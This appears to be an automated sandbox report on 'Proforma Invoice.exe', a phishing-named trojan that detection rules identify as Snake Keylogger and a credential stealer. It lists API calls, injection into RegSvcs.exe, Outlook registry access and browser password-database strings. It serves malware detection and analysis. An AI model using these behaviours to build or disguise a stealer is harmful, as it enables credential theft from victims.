                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006C19780_2_006C1978
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006D9AB50_2_006D9AB5
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006AFCE00_2_006AFCE0
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00727DDB0_2_00727DDB
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006CBDA60_2_006CBDA6
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006C1D900_2_006C1D90
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006ADF000_2_006ADF00
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006B3FE00_2_006B3FE0
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_01E536200_2_01E53620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016A60E01_2_016A60E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016A43281_2_016A4328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016A8DA01_2_016A8DA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016A59681_2_016A5968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016A27B91_2_016A27B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016A2DD11_2_016A2DD1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569C6681_2_0569C668
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_056900401_2_05690040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569C0101_2_0569C010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_056972101_2_05697210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05692CF01_2_05692CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569EE701_2_0569EE70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_056978E01_2_056978E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569E5C01_2_0569E5C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569E5B01_2_0569E5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569D4601_2_0569D460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569D4501_2_0569D450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569B7601_2_0569B760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569B7501_2_0569B750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_056977E61_2_056977E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569C6581_2_0569C658
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569E1681_2_0569E168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569E1581_2_0569E158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569C0011_2_0569C001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_056900061_2_05690006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569B3081_2_0569B308
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569B2F91_2_0569B2F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569DD001_2_0569DD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569DD101_2_0569DD10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05692CE11_2_05692CE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05696FF01_2_05696FF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569AEA11_2_0569AEA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569AEB01_2_0569AEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_056968681_2_05696868
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569786E1_2_0569786E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_056968581_2_05696858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569D8A81_2_0569D8A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569D8B81_2_0569D8B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569BBA81_2_0569BBA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569BBB81_2_0569BBB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569AA491_2_0569AA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569AA581_2_0569AA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569EA091_2_0569EA09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0569EA181_2_0569EA18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_066A43401_2_066A4340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_066A5BC01_2_066A5BC0
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: String function: 006C8900 appears 42 times
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: String function: 006A7DE1 appears 36 times
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: String function: 006C0AE3 appears 70 times
                Source: Proforma Invoice.exe, 00000000.00000003.1766369944.0000000003CB3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Proforma Invoice.exe
                Source: Proforma Invoice.exe, 00000000.00000003.1766560373.0000000003E5D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Proforma Invoice.exe
                Source: Proforma Invoice.exe, 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Proforma Invoice.exe
                Source: Proforma Invoice.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Proforma Invoice.exe.1e60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Proforma Invoice.exe.1e60000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: Process Memory Space: Proforma Invoice.exe PID: 7308, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 7324, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@3/3
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070A06A GetLastError,FormatMessageW,0_2_0070A06A
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006F81CB AdjustTokenPrivileges,CloseHandle,0_2_006F81CB
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006F87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_006F87E1
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0070B333
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0071EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0071EE0D
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_007183BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_007183BB
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006A4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_006A4E89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\Proforma Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\autA10F.tmpJump to behavior
                Source: Proforma Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegSvcs.exe, 00000001.00000002.4216346327.0000000003194000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4216346327.0000000003176000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4216346327.0000000003185000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Proforma Invoice.exeReversingLabs: Detection: 52%
                Source: unknownProcess created: C:\Users\user\Desktop\Proforma Invoice.exe "C:\Users\user\Desktop\Proforma Invoice.exe"
                Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Proforma Invoice.exe"
                Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Proforma Invoice.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Proforma Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Proforma Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Proforma Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Proforma Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Proforma Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Proforma Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Proforma Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: Proforma Invoice.exe, 00000000.00000003.1767012334.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000003.1766560373.0000000003D30000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Proforma Invoice.exe, 00000000.00000003.1767012334.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000003.1766560373.0000000003D30000.00000004.00001000.00020000.00000000.sdmp
                Source: Proforma Invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Proforma Invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Proforma Invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Proforma Invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Proforma Invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006A4B37 LoadLibraryA,GetProcAddress,0_2_006A4B37
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070848F push FFFFFF8Bh; iretd 0_2_00708491
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006CE70F push edi; ret 0_2_006CE711
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006CE828 push esi; ret 0_2_006CE82A
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006C8945 push ecx; ret 0_2_006C8958
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006CEA03 push esi; ret 0_2_006CEA05
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006CEAEC push edi; ret 0_2_006CEAEE
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006ACBB2 push 00000000h; retf 0_2_006ACBB4
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006AB5E0 push 00000000h; ret 0_2_006AB5E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_066A6CD1 push 18418B05h; ret 1_2_066A6CE3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_066A7971 push 1C418B05h; ret 1_2_066A79C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_066A79D0 push 0C418B05h; ret 1_2_066A7A63
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006A48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_006A48D7
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00725376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00725376
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006C3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006C3187
                Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
